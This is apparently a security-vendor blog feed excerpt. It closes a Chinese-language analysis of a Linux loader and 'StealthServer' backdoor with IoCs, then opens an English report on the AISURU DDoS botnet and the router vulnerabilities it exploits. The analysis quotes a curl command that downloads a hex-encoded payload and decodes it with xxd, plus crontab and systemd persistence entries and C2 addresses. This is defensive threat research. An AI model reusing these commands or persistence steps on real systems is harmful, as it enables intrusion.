<p>&#x7136;&#x540E;&#x6267;&#x884C; POST &#x8BF7;&#x6C42;<code>&#x201C;/upload?last=true&#x201D;</code>&#x628A;&#x6587;&#x4EF6;&#x53D1;&#x9001;&#x5230;&#x8FDC;&#x7A0B;&#x670D;&#x52A1;&#x5668;&#xFF0C;X-Username &#x7528;&#x4E8E;&#x6807;&#x8BB0;&#x5F53;&#x524D;&#x7528;&#x6237;&#x540D;&#xFF0C;&#x4FBF;&#x4E8E;&#x670D;&#x52A1;&#x5668;&#x8BC6;&#x522B;&#x5BF9;&#x5E94;&#x6587;&#x4EF6;&#x5C5E;&#x4E8E;&#x54EA;&#x4E00;&#x4E2A;&#x7528;&#x6237;&#xFF0C;X-File-Name &#x662F; base64 &#x7F16;&#x7801;&#x7684;&#x6587;&#x4EF6;&#x540D;&#x3002;&#x6587;&#x4EF6;&#x5185;&#x5BB9;&#x7ECF;&#x8FC7; AES-GCM &#x7B97;&#x6CD5;&#x52A0;&#x5BC6;&#xFF0C;&#x52A0;&#x5BC6;&#x8FC7;&#x7A0B;&#x662F;&#x9996;&#x5148;&#x83B7;&#x53D6;&#x786C;&#x7F16;&#x7801;&#x5728;&#x6837;&#x672C;&#x4E2D;&#x7684;&#x4E00;&#x4E2A;&#x5B57;&#x7B26;&#x4E32;&#xFF0C;&#x8FDB;&#x884C; sha256 &#x8BA1;&#x7B97;&#x4E4B;&#x540E;&#x4F5C;&#x4E3A; AES &#x7684; key&#xFF0C;&#x7136;&#x540E;&#x968F;&#x673A;&#x751F;&#x6210; 12 &#x5B57;&#x8282;&#x4F5C;&#x4E3A; GCM &#x7684; Nonce&#xFF0C;&#x5E76;&#x4FDD;&#x5B58;&#x5728;&#x8BF7;&#x6C42;&#x4E2D;&#x7684; X-Nonce &#x5B57;&#x6BB5;&#xFF0C;&#x6700;&#x540E;&#x52A0;&#x5BC6;&#x5B8C;&#x6BD5;&#x5F97;&#x5230;&#x7684; 16 &#x5B57;&#x8282; Tag &#x6570;&#x636E;&#x9644;&#x52A0;&#x5728;&#x6587;&#x4EF6;&#x5BC6;&#x6587;&#x5C3E;&#x90E8;&#xFF0C;&#x4E00;&#x8D77;&#x53D1;&#x9001;&#x5230;&#x8FDC;&#x7A0B;&#x670D;&#x52A1;&#x5668;&#x3002;</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/09/upload.png" alt="upload.png" loading="lazy"></p>
<p>&#x4EE5;&#x4E0A;&#x56FE;&#x53D1;&#x9001;&#x7684;&#x6587;&#x4EF6;&#x4E3A;&#x4F8B;&#xFF0C;&#x6837;&#x672C;&#x4E2D;&#x786C;&#x7F16;&#x7801;&#x7684; AES.key &#x539F;&#x59CB;&#x5B57;&#x7B26;&#x4E32;&#x4E3A;<code>617d6e6f298505d2855f3f85e30a971a01bee4fb9417456d2e11090e170e80ea</code>&#xFF0C;&#x56E0;&#x6B64;&#x80FD;&#x591F;&#x8FD8;&#x539F;&#x5F97;&#x5230;&#x4E0B;&#x8FF0;&#x6587;&#x4EF6;&#x5185;&#x5BB9;&#x3002;</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/09/file-content.png" alt="file-content.png" loading="lazy"></p>
<h2 id="linux-v2-websocket"><strong>Linux-V2: WebSocket</strong></h2>
<h3 id="loader">#Loader</h3>
<p>&#x516B;&#x6708;&#x4E2D;&#x65EC;&#x53D1;&#x73B0;&#x4E86;&#x53E6;&#x4E00;&#x4E2A; Linux &#x7248;&#x672C;&#x7684;&#x6837;&#x672C;&#xFF0C;&#x5165;&#x53E3;&#x662F;&#x4E00;&#x4E2A;&#x540D;&#x4E3A; <strong>&#x201C;PROCUREMENT_OF_MANPORTABLE_&amp;_COMPAC.pdf.desktop&#x201D;</strong> &#x7684;&#x6587;&#x4EF6;&#xFF0C;&#x5185;&#x5BB9;&#x5305;&#x542B;&#x4E09;&#x5343;&#x591A;&#x884C;&#x6CE8;&#x91CA;&#xFF0C;&#x5728;&#x6587;&#x4EF6;&#x4E2D;&#x90E8;&#x5305;&#x542B;&#x4E86;&#x5B9E;&#x9645;&#x4F1A;&#x6267;&#x884C;&#x7684;&#x6307;&#x4EE4;&#x3002;&#x6267;&#x884C;&#x903B;&#x8F91;&#x57FA;&#x672C;&#x540C; HTTP &#x7248;&#x672C;&#x7684;&#x6837;&#x672C;&#xFF0C;&#x53EA;&#x4E0D;&#x8FC7; cmd &#x6307;&#x4EE4;&#x901A;&#x8FC7; base64 &#x7F16;&#x7801;&#x3002;</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/09/linux-v2.png" alt="linux-v2.png" loading="lazy"></p>
<p>&#x540C;&#x6837;&#x5730;&#xFF0C;&#x6253;&#x5F00; Firefox &#x6D4F;&#x89C8;&#x5668;&#x8BBF;&#x95EE;&#x4E0B;&#x8FF0; GoogleDrive &#x9875;&#x9762;&#x6B3A;&#x9A97;&#x7528;&#x6237;&#xFF0C;&#x8FD9;&#x662F;&#x4E00;&#x4EFD;&#x540D;&#x4E3A; <strong>&#x201C;Draft RFI for PDS 18 Aug 25 Final.pdf&#x201D;</strong> &#x7684;&#x6587;&#x4EF6;&#xFF0C;&#x5185;&#x5BB9;&#x5927;&#x6982;&#x662F; <strong>&#x201C;&#x8F6C;&#x53D1;&#x5173;&#x4E8E;&#x300A;&#x5F81;&#x8BE2;&#x4FE1;&#x606F;&#xFF08;RFI&#xFF09;&#x300B;&#x7684;&#x8349;&#x6848;&#xFF0C;&#x7528;&#x4E8E;&#x91C7;&#x8D2D;&#x201C;&#x53EF;&#x643A;&#x5E26;&#x3001;&#x8F7B;&#x4FBF;&#x7684;&#x88AB;&#x52A8;&#x63A2;&#x6D4B;&#x4E0E;&#x5BF9;&#x6297;&#x63AA;&#x65BD;&#x7CFB;&#x7EDF;&#xFF08;LWPD-CMS&#xFF09;&#x201D;&#x201D;</strong>&#x3002;</p>
<pre><code>firefox --new-window &quot;https://drive.google.com/file/d/1kn0L_6WYbfUUx0dmzwfALDnzkVHJAPTu/view?usp=drive_link&quot;
</code></pre>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/09/Linux-v2-PDF.png" alt="Linux-v2-PDF.png" loading="lazy"></p>
<p>StealthServer &#x7684; Payload &#x4E5F;&#x662F;&#x4E00;&#x4EFD;&#x5341;&#x516D;&#x8FDB;&#x5236; HEX &#x683C;&#x5F0F;&#x7684;&#x5B57;&#x7B26;&#x4E32;&#x6587;&#x4EF6;&#xFF0C;&#x7ECF;&#x8FC7;<code>&#x201C;xxd -r -p&#x201D;</code>&#x6307;&#x4EE4;&#x5373;&#x53EF;&#x8F6C;&#x6362;&#x4E3A; ELF &#x6587;&#x4EF6;&#xFF0C;&#x6DFB;&#x52A0;&#x53EF;&#x6267;&#x884C;&#x6743;&#x9650;&#x4E4B;&#x540E;&#x8FD0;&#x884C;&#x7A0B;&#x5E8F;&#x3002;</p>
<pre><code>eaMXJW=&quot;--fail --location --show-error&quot;; curl ${eaMXJW} &quot;https://drive.google.com/uc?export=download&amp;id=1VQQiTt78N3KpYJzVbE-95uILnO84Wz_-&quot; | xxd -r -p
</code></pre>
<h3 id="stealthserver">#StealthServer</h3>
<p>&#x8FD9;&#x4E2A;&#x53D8;&#x79CD;&#x7684;&#x5F00;&#x53D1;&#x8DEF;&#x5F84;&#x662F; <strong>&#x201C;D:/bossmaya/newlinuxblkul/client/main_obfuscated_enhanced.go&#x201D;</strong>&#xFF0C;&#x6807;&#x8BB0;&#x4E3A;&#x589E;&#x5F3A;&#x7248;&#xFF0C;&#x540C;&#x6837;&#x4F7F;&#x7528;&#x4E86;&#x5927;&#x91CF;&#x5783;&#x573E;&#x4EE3;&#x7801;&#xFF0C;&#x4F46;&#x51FD;&#x6570;&#x540D;&#x5E76;&#x6CA1;&#x6709;&#x8FDB;&#x884C;&#x6DF7;&#x6DC6;&#x3002;</p>
<h5 id="1-%E6%8C%81%E4%B9%85%E5%8C%96">1. &#x6301;&#x4E45;&#x5316;</h5>
<p>&#x4E0D;&#x540C;&#x7684;&#x662F;&#x8FD9;&#x4E2A;&#x53D8;&#x79CD;&#x53EF;&#x4EE5;&#x63A5;&#x53D7;&#x4E00;&#x4E2A;&#x53C2;&#x6570;<code>&#x201C;--hidden&#x201D;</code>&#xFF0C;&#x5F53;&#x4F20;&#x5165;&#x8FD9;&#x4E2A;&#x53C2;&#x6570;&#x65F6;&#x4F1A;&#x8DF3;&#x8FC7;&#x6301;&#x4E45;&#x5316;&#x7684;&#x90E8;&#x5206;&#x3002;&#x6301;&#x4E45;&#x5316;&#x7684;&#x903B;&#x8F91;&#x662F;&#x628A;&#x81EA;&#x8EAB; ELF &#x6587;&#x4EF6;&#x62F7;&#x8D1D;&#x5230;<code>&#x201C;~/.config/system-backup/&#x201D;</code>&#x76EE;&#x5F55;&#x4E0B;&#xFF0C;&#x7136;&#x540E;&#x6DFB;&#x52A0; crontab &#x8BA1;&#x5212;&#x4EFB;&#x52A1;&#x547D;&#x4EE4;<code>@reboot %s &gt; /dev/null 2&gt;&amp;1</code>&#xFF0C;&#x8FD9;&#x4F1A;&#x4F7F;&#x6BCF;&#x6B21;&#x7CFB;&#x7EDF;&#x91CD;&#x542F;&#x540E;&#x81EA;&#x52A8;&#x8FD0;&#x884C;&#x62F7;&#x8D1D;&#x540E;&#x7684; ELF &#x6587;&#x4EF6;&#xFF0C;&#x5E76;&#x4E14;&#x5B8C;&#x5168;&#x9690;&#x85CF;&#x5B83;&#x7684;&#x8F93;&#x51FA;&#x3002;&#x968F;&#x540E;&#x6DFB;&#x52A0;&#x4E0B;&#x8FF0;&#x7CFB;&#x7EDF;&#x4EFB;&#x52A1;<code>&#x201C;system-backup.service&#x201D;</code>&#x4FDD;&#x8BC1;&#x6301;&#x7EED;&#x8FD0;&#x884C;&#x3002;</p>
<pre><code>[Unit]
Description=System Backup Service
After=network.target

[Service]
Type=simple
ExecStart=%s
Restart=always
RestartSec=10
User=%s

[Install]
WantedBy=default.target
</code></pre>
<h5 id="2-%E7%BD%91%E7%BB%9C%E9%80%9A%E4%BF%A1">2. &#x7F51;&#x7EDC;&#x901A;&#x4FE1;</h5>
<p>&#x8BE5;&#x53D8;&#x79CD;&#x901A;&#x4FE1;&#x534F;&#x8BAE;&#x6539;&#x4E3A; WebSocket &#x534F;&#x8BAE;&#xFF0C;&#x4F46;&#x6570;&#x636E;&#x5305;&#x8FD8;&#x662F;&#x4F7F;&#x7528; JSON &#x683C;&#x5F0F;&#xFF0C;C2 &#x7ECF;&#x8FC7; base64 &#x7F16;&#x7801;&#xFF1A;<strong>&#x201C;d3M6Ly9zZWVteXNpdGVsaXZlLnN0b3JlOjgwODAvd3M=&#x201D;</strong>&#xFF0C;&#x89E3;&#x7801;&#x540E;&#x5F97;&#x5230;<code>ws://seemysitelive[.]store:8080/ws</code>&#x3002;&#x5F53;&#x8FDE;&#x63A5;&#x6210;&#x529F;&#x4E4B;&#x540E;&#x5BA2;&#x6237;&#x7AEF;&#x54CD;&#x5E94;&#x5982;&#x4E0B;&#x4FE1;&#x606F;&#xFF0C;&#x5176;&#x4E2D;&#x5305;&#x62EC;<code>&quot;Welcome to Stealth Server&quot;</code>&#x3002;</p>
<pre><code>{
  &quot;type&quot;: &quot;welcome&quot;,
  &quot;client_id&quot;: &quot;fd77350b-d70b-4978-bc54-bc5b16843904&quot;,
  &quot;data&quot;: &quot;Welcome to Stealth Server&quot;,
  &quot;timestamp&quot;: &quot;2025-08-20T03:04:07.8960862-07:00&quot;
}
</code></pre>
<p>&#x7136;&#x540E;&#x5411; C2 &#x53D1;&#x9001;&#x5982;&#x4E0B;&#x5BA2;&#x6237;&#x7AEF;&#x4FE1;&#x606F;&#x3002;</p>
<pre><code>{
  &quot;type&quot;: &quot;client_info&quot;,
  &quot;client_id&quot;: &quot;7a8dfc96-eea9-4c46-8e48-0ddb2dd2be41&quot;,
  &quot;data&quot;: {
    &quot;current_dir&quot;: &quot;/tmp&quot;,
    &quot;hostname&quot;: &quot;buffalo&quot;,
    &quot;ip_address&quot;: &quot;35.*.*.48&quot;,
    &quot;location&quot;: &quot;Council Bluffs, Iowa, United States&quot;,
    &quot;os&quot;: &quot;linux&quot;,
    &quot;username&quot;: &quot;root&quot;
  },
  &quot;timestamp&quot;: &quot;2025-08-20T10:04:07.538478245Z&quot;
}
</code></pre>
<p>&#x968F;&#x540E;&#x5BA2;&#x6237;&#x7AEF;&#x548C;&#x670D;&#x52A1;&#x7AEF;&#x6BCF;&#x9694; 30 &#x79D2;&#x4E92;&#x76F8;&#x5411;&#x5BF9;&#x65B9;&#x53D1;&#x9001;&#x5FC3;&#x8DF3;&#x4FE1;&#x606F;&#x3002;</p>
<pre><code>response&#xFF1A;
{
  &quot;type&quot;: &quot;heartbeat&quot;,
  &quot;timestamp&quot;: &quot;2025-08-20T03:04:37.8972773-07:00&quot;
}

sendto&#xFF1A;
{
  &quot;type&quot;: &quot;heartbeat_response&quot;,
  &quot;client_id&quot;: &quot;7a8dfc96-eea9-4c46-8e48-0ddb2dd2be41&quot;,
  &quot;timestamp&quot;: &quot;2025-08-20T10:04:36.244598102Z&quot;
}
</code></pre>
<p>&#x652F;&#x6301;&#x5982;&#x4E0B;&#x51E0;&#x4E2A;&#x6307;&#x4EE4;&#xFF1A;</p>
<pre><code>browse_files&#xFF1A;&#x53D1;&#x9001;&#x6307;&#x5B9A;&#x8DEF;&#x5F84;&#x7684;&#x6587;&#x4EF6;&#x5217;&#x8868;
upload_execute&#xFF1A;&#x4E0A;&#x4F20;&#x6307;&#x5B9A;&#x6587;&#x4EF6;
start_collection&#xFF1A;&#x641C;&#x7D22;&#x6307;&#x5B9A;&#x540E;&#x7F00;&#x7684;&#x6587;&#x4EF6;
ping
welcome
heartbeat
</code></pre>
<h1 id="%E7%BB%93%E8%AE%BA">&#x7ED3;&#x8BBA;</h1>
<p>&#x8BE5;&#x7EC4;&#x7EC7;&#x653B;&#x51FB;&#x6D3B;&#x52A8;&#x9891;&#x7E41;&#xFF0C;&#x5448;&#x73B0;&#x5DE5;&#x5177;&#x591A;&#x3001;&#x53D8;&#x79CD;&#x591A;&#x3001;&#x6295;&#x9012;&#x9891;&#x7387;&#x9AD8;&#x7B49;&#x7279;&#x70B9;&#x3002;&#x82E5;&#x60A8;&#x5BF9;&#x6B64;&#x8BDD;&#x9898;&#x611F;&#x5174;&#x8DA3;&#xFF0C;&#x6B22;&#x8FCE;&#x901A;&#x8FC7; <a href="https://x.com/Xlab_qax?ref=blog.xlab.qianxin.com">X</a> &#x4E0E;&#x6211;&#x4EEC;&#x8054;&#x7CFB;&#x3002;</p>
<h1 id="ioc">IoC</h1>
<pre><code>Samples&#xFF1A;
dc64c34ba92375f8dc8ae8cf90a1f535a0aa5a29fcf965af5ad4982cd16e9d71
8f8da8861c368e74b9b5c1c59e64ef00690c5eff4a95e1b4fcf386973895bef1
6347f46d77a47b90789a1209b8f573b2529a6084f858a27d977bf23ee8a79113
662890bb5baba4a7a9ba718bdedd6991fbf9867c83e676172f5527617e05cafa
264d88624ec527458d4734eff6f1e534fcacb77e5616ae61abed94a941389232
56260e90bba2c50af7c6d82e8656224ece23445f1d76e87a97c938ad9883005f
499f16ed2def90b3d4c0de5ca22d8c8080c26a1a405b4078e262a0a34bcb1e31
7a946339439eb678316a124b8d700b21de919c81ee5bef33e8cb848b7183927b
10b54abba525686869c9da223250f70270a742b1a056424c943cfc438c40cc50
ece1620e218f2c8b68312c874697c183f400c72a42855d885fc00865e0ccc1a1
ab85924ba95692995ac622172ed7f2ebc1997450d86f5245b03491422be2f3d6
cf39bb998db59d3db92114d2235770a4a6c9cbf6354462cfedd1df09e60fe007

Domain&#xFF1A;
modindia[.]serveminecraft.net
modgovindia[.]space
seemysitelive[.]store
solarwindturbine[.]site
sinjita[.]store
sinjita[.]space
seeconnectionalive[.]website
windturbine[.]website 
kavach[.]space
zahcomputers.pk[.]modpersonnel.support
discoverlive[.]site
cloudstore[.]cam

IP&#xFF1A;
45.155.54[.]122	Switzerland|Zurich|Z&#xFC;rich	AS200019|ALEXHOST SRL
45.155.54[.]62	Switzerland|Zurich|Z&#xFC;rich	AS200019|ALEXHOST SRL
45.155.54[.]28	Switzerland|Zurich|Z&#xFC;rich	AS200019|ALEXHOST SRL
45.155.53[.]179	Switzerland|Zurich|Z&#xFC;rich	AS200019|ALEXHOST SRL
45.155.53[.]204	Switzerland|Zurich|Z&#xFC;rich	AS200019|ALEXHOST SRL
45.141.58[.]199	The Netherlands|Flevoland|Dronten	AS213373|IP Connect Inc
101.99.94[.]109	Bulgaria|Sofia-Capital|Sofia	AS45839|Shinjiru Technology Sdn Bhd
164.215.103[.]55	The Netherlands|Flevoland|Dronten	AS213373|IP Connect Inc
161.97.82[.]97	France|Grand Est|Lauterbourg	AS51167|Contabo GmbH
5.178.0[.]29	The Netherlands|Flevoland|Dronten	AS213373|IP Connect Inc

Golang path&#xFF1A;
D:/bossmaya/linuxnewdownloader/windows-client/obfuscated_main.go
D:/bossmaya/newlinuxblkul/client/main_obfuscated.go
D:/bossmaya/newlinuxblkul/client/main_obfuscated_enhanced.go
D:/bossmaya/client/obfuscated_client.go
D:/bossmaya/newblkul/client/client.go
D:/bossmaya/newblkul/client/client_obfuscated.go
/home/boss/Desktop/tgtfile/main_obfuscated_enhanced.go
</code></pre>
]]></content:encoded></item><item><title><![CDATA[The Most Powerful Ever? Inside the 11.5Tbps-Scale Mega Botnet AISURU]]></title><description><![CDATA[<h2 id="overview">Overview</h2>
<p>Since 2025, peak bandwidth for global DDoS attacks has repeatedly broken historical records, rising from <a href="https://blog.xlab.qianxin.com/large-scale-botnet-airashi-en/">3.12 Tbps</a> at the start of the year to a staggering <a href="https://x.com/Cloudflare/status/1962953494459252843?ref=blog.xlab.qianxin.com">11.5 Tbps</a> recently. In multiple high-impact or record-breaking attack incidents, we consistently observed a botnet named AISURU operating behind the scenes.</p>]]></description><link>https://blog.xlab.qianxin.com/super-large-scale-botnet-aisuru-en/</link><guid isPermaLink="false">68c22b40428efe0001a2538f</guid><category><![CDATA[Botnet]]></category><category><![CDATA[DDoS]]></category><category><![CDATA[EN]]></category><dc:creator><![CDATA[Wang Hao]]></dc:creator><pubDate>Mon, 15 Sep 2025 14:00:44 GMT</pubDate><content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>Since 2025, peak bandwidth for global DDoS attacks has repeatedly broken historical records, rising from <a href="https://blog.xlab.qianxin.com/large-scale-botnet-airashi-en/">3.12 Tbps</a> at the start of the year to a staggering <a href="https://x.com/Cloudflare/status/1962953494459252843?ref=blog.xlab.qianxin.com">11.5 Tbps</a> recently. In multiple high-impact or record-breaking attack incidents, we consistently observed a botnet named AISURU operating behind the scenes.</p>
<figure>
  <img src="https://blog.xlab.qianxin.com/content/images/2025/09/Gzxpms8XQAA9x6H.jpeg" alt="Cloudflare 11.5T ddos event">
  <figcaption>Cloudflare Mitigates 11.5 Tbps DDoS Attack</figcaption>
</figure>
<figure>
  <img src="https://blog.xlab.qianxin.com/content/images/2025/09/aisuru_attack.png" alt="aisuru_attack">
  <figcaption>XLAB Attack Incident Monitoring Data</figcaption>
</figure>
<p>The AISURU botnet was first <a href="https://blog.xlab.qianxin.com/large-scale-botnet-airashi-en/">disclosed</a> by XLab in August 2024 and participated in DDoS attacks against the distribution platform for the game &quot;Black Myth: Wukong.&quot; Since March of this year, XLab&apos;s Cyber Threat Insight and Analysis System(CTIA) has continuously captured new samples of the botnet. Multiple sources indicate the group allegedly compromised a router firmware update server in April and distributed malicious scripts to expand the botnet. The node count is currently reported to be around 300,000.</p>
<p>More alarmingly, some AISURU samples embed &quot;Easter egg&quot; messages that go beyond pure attack intent and attempt to convey certain ideological content. Given this serious situation, we decided to write this report to publicly share our findings with the security community and call on all parties to join forces to combat this increasingly rampant cybercriminal activity.</p>
<h2 id="anonymous-source-xlab-visibility">Anonymous Source &amp; XLab Visibility</h2>
<p>XLab has long been deeply involved in DDoS research and continually publishes reliable, in-depth analysis, earning a strong reputation among defenders and within attacker circles. Recently, an anonymous informed source provided intelligence about the AISURU/AIRASHI botnet, hoping to dismantle AISURU similarly to the effort against the Fodcha botnet. This lead allowed us to get closer to the group behind AISURU and unveil the botnet&apos;s operations.</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/09/aisuru_agreement.png" alt="aisuru_agreement.png" loading="lazy"></p>
<h3 id="anonymous-source">Anonymous Source</h3>
<blockquote>
<blockquote>
<p>We have got the authorization from the source that it&apos;s okay to publish the conversations.</p>
</blockquote>
</blockquote>
<p>According to the anonymous source, the AISURU group has three key figures codenamed Snow, Tom, and Forky. In 2022, Forky met Snow and Tom when they were still small-time. After several successful collaborations including the catddos botnet, the three formed the AISURU team.</p>
<ul>
<li>Snow: responsible for botnet development</li>
<li>Tom: responsible for vulnerabilities, including discovering 0-days and integrating N-days</li>
<li>Forky: responsible for botnet sales</li>
</ul>
<p>In April 2025, Tom successfully breached a totolink router firmware update server and set the firmware upgrade URL to download and execute a malicious script. This means any totolink router that performed the update could be infected by AISURU.</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/09/aisuru_totoupdate.png" alt="aisuru_totoupdate.png" loading="lazy"></p>
<p>This intrusion rapidly increased AISURU&apos;s scale, surpassing 100,000 devices in a short time. Faced with such a vast size, the group was somewhat unprepared and had to work overtime configuring strategies on several C2 IPs and using GRE TUNNEL to distribute traffic.</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/09/aisuru_gretunnel-1.png" alt="aisuru_gretunnel.png" loading="lazy"></p>
<p>The members of the AISURU group act flamboyantly and often launch highly destructive attacks on ISPs under the pretext of &quot;for fun.&quot; As they even mentioned in their samples, &quot;I don&apos;t feel right as myself, with my failing mental health,&quot; they are often being mockingly referred to as &quot;mentally unstable,&quot; which has earned them a very bad reputation in the DDoS community, making countless enemies.</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/09/aisuru_respect.png" alt="aisuru_respect.png" loading="lazy"></p>
<p>By late April, AISURU&#x2019;s &quot;enemies&quot; began leaking details on social media. The first shot came under a Cloudflare post about mitigating a record 5.8 Tbps attack, where someone replied: &#x201C;This came from 340k Totolink routers!&#x201D; A few days later, they dropped heavier evidence&#x2014;a leaked screenshot of the botnet panel showing over 300,000 active bots, including about 30,000 from China. With the taunt &quot;welcome to totolink botnet&quot; and tags to <code>Totolink</code> and <code>Interpol</code>, the leaks were clearly aimed at drawing public and law enforcement attention to take down AISURU.</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/09/aisuru_static.png" alt="aisuru_static.png" loading="lazy"></p>
<p>Currently, the totolink update server vulnerability has been patched. The AISURU group jokingly posted <code>RIP TOTOLINK 2025-2025</code>, but the botnet&apos;s scale was not affected and remains around 300k nodes.</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/09/aisuru_patch-1.png" alt="aisuru_patch.png" loading="lazy"></p>
<p>Before the record 12.1 Tbps event in September 2025, AISURU ran several attack tests, including an attack on security journalist Brian Krebs&apos; personal site; the attack traffic set &quot;world records&quot; at those times.</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/09/aisuru_talk.png" alt="aisuru_talk.png" loading="lazy"></p>
<p>Interestingly, &quot;Ethan J Foltz&quot; is the real name of the Rapper Botnet&apos;s author, who was <a href="https://www.justice.gov/usao-ak/pr/oregon-man-charged-administering-rapper-bot-ddos-hire-botnet?ref=blog.xlab.qianxin.com">arrested</a> on 2025-08-06; the ID &quot;Ethan J Foltz&quot; used below was actually Snow, who used it to mock Rapperbot &#x2014; possibly a reason AISURU drew ire in the DDoS community.</p>
<h3 id="xlab-visibility">XLab Visibility</h3>
<p>For readers wondering about the credibility of the anonymous source &#x2014; &quot;This is an interesting rumor, but how reliable is it?&quot; &#x2014; while we may not be able to verify the persons, XLab&apos;s Cyber Threat Insight and Analysis System provides solid visibility into <code>samples, C2 servers, and attack events</code>. Using the group&apos;s key activities as anchors and cross-referencing datasets, <strong>we believe the attack incident intelligence provided by the anonymous source is highly credible</strong>.</p>
<h4 id="1-malicious-script-tsh-implanted-into-totolink-update-server-in-april-2025">1: Malicious script t.sh implanted into totolink update server in April 2025</h4>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/09/aisuru_download.png" alt="aisuru_download.png" loading="lazy"><br>
From the 26th, the script began using the domain updatetoto.tw. We used domain ranking system <a href="https://tranco-list.eu/?ref=blog.xlab.qianxin.com">Tranco</a> to measure its activity.</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/09/aisuru_tranco.png" alt="aisuru_tranco.png" loading="lazy"></p>
<p>Using the ranking from April 29 to May 30 as an example, the downloader domain updatetoto.tw &#x2014; created on April 25 &#x2014; rose to rank 672,588 globally within one month, proving the AISURU group&apos;s infection campaign was highly successful.</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/09/aisuru_rank.png" alt="aisuru_rank.png" loading="lazy"></p>
<h4 id="2-c2-ips-enabling-gre-tunnel-in-april-2025">2: C2 IPs enabling GRE TUNNEL in April 2025</h4>
<p>The AISURU group configured GRE Tunnels on four IPs: 151.242.2.22 to 151.242.2.25. These serve as C2 servers.</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/09/aisuru_gre.png" alt="aisuru_gre.png" loading="lazy"></p>
<p>In April, we also captured the C2 domain approach.ilovegaysex[.]su; its TXT record, once decoded, covered these four IPs, indicating the C2 belonged to the AISURU group.</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/09/aisuru_pdns.png" alt="aisuru_pdns.png" loading="lazy"></p>
<h4 id="3-may-2025-attack-on-krebsonsecurity">3: May 2025 attack on KrebsOnSecurity</h4>
<p>By tracking commands from the malicious ilovegaysex domain&apos;s C2 servers, we detected an attack on security reporter Brian Krebs&apos; personal blog in May.</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/09/aisuru_kreb.png" alt="aisuru_kreb.png" loading="lazy"></p>
<h4 id="4-september-2025-attack-on-18521178117">4: September 2025 attack on 185.211.78.117</h4>
<p>By tracking commands from C2 servers, we observed an attack in September against <code>185.211.78.117</code> with an astonishing 11.5 Tbps of traffic.</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/09/aisuru_attack.png" alt="aisuru_attack.png" loading="lazy"></p>
<h2 id="sample-propagation">Sample Propagation</h2>
<p>Leveraging the capabilities of the XLab&apos;s Cyber Threat Insight and Analysis System, we have observed that Aisuru samples have recently been spreading primarily via NDAY vulnerabilities, while also possessing the ability to exploit 0DAY vulnerabilities. The 0DAY affecting cnPilot routers from Cambium Networks (USA), first exploited in June of last year, is still being actively used. Some of the vulnerabilities leveraged by Aisuru for sample propagation are as follows&#xFF1A;</p>
<table>
<thead>
<tr>
<th>Vulnerability</th>
<th>Affected Vendor</th>
<th>Affected Devices</th>
</tr>
</thead>
<tbody>
<tr>
<td><a href="http://a-mtk.com/wp-content/uploads/2015/06/Common-CGI-command-EN-20150331.pdf?ref=blog.xlab.qianxin.com">AMTK-CAMERA-CMD-RCE</a></td>
<td>A-MTK</td>
<td>Camera</td>
</tr>
<tr>
<td><a href="https://www.exploit-db.com/exploits/25138?ref=blog.xlab.qianxin.com">CVE-2013-1599</a></td>
<td>D-Link</td>
<td>DCS-3411 Firmware</td>
</tr>
<tr>
<td><a href="http://www.s3cur1ty.de/m1adv2013-004?ref=blog.xlab.qianxin.com">CVE-2013-3307</a></td>
<td>Linksys</td>
<td>Linksys X3000</td>
</tr>
<tr>
<td><a href="https://www.exploit-db.com/exploits/25998?ref=blog.xlab.qianxin.com">CVE-2013-5948</a></td>
<td>T-Mobile</td>
<td>Tm-Ac1900</td>
</tr>
<tr>
<td><a href="https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/admin/http/cnpilot_r_cmd_exec.rb?ref=blog.xlab.qianxin.com">CVE-2017-5259</a></td>
<td>Cambiumnetworks</td>
<td>Cnpilot R190V Firmware</td>
</tr>
<tr>
<td><a href="https://packetstormsecurity.com/files/170366/Nexxt-Router-Firmware-42.103.1.5095-Remote-Code-Execution.html?ref=blog.xlab.qianxin.com">CVE-2022-44149</a></td>
<td>Nexxt</td>
<td>Router</td>
</tr>
<tr>
<td><a href="https://raw.githubusercontent.com/BenHays142/CVE-2023-28771-PoC/main/CVE-2023-28771-poc.py?ref=blog.xlab.qianxin.com">CVE-2023-28771</a></td>
<td>Zyxel,Zyxel,Zyxel,Zyxel</td>
<td>Zyxel ATP,Zyxel USG FLEX,Zyxel VPN,Zyxel ZyWALL/USG</td>
</tr>
<tr>
<td><a href="https://talosintelligence.com/vulnerability_reports/TALOS-2023-1899?ref=blog.xlab.qianxin.com">CVE-2023-50381</a></td>
<td>Realtek</td>
<td>rtl819x Jungle SDK v3.4.11</td>
</tr>
<tr>
<td><a href="https://blog.netlab.360.com/multiple-botnets-are-spreading-using-lilin-dvr-0-day/?ref=blog.xlab.qianxin.com">LILIN-DVR-RCE</a></td>
<td>LILIN</td>
<td>DVR</td>
</tr>
<tr>
<td><a href="https://blog.nicter.jp/2022/10/analysis-of-ddos-bot-targeting-dvrs/?ref=blog.xlab.qianxin.com#fn:1">CVE-2022-35733</a></td>
<td>UNIMO</td>
<td>DVR UDR-JA1004/JA1008/JA101</td>
</tr>
<tr>
<td><a href="https://github.com/netsecfish/tbk_dvr_command_injection?ref=blog.xlab.qianxin.com">CVE-2024-3721</a></td>
<td>TBK</td>
<td>DVR</td>
</tr>
<tr>
<td>CNPILOT-0DAY-RCE</td>
<td>Cambium Networks</td>
<td>cnPilot</td>
</tr>
<tr>
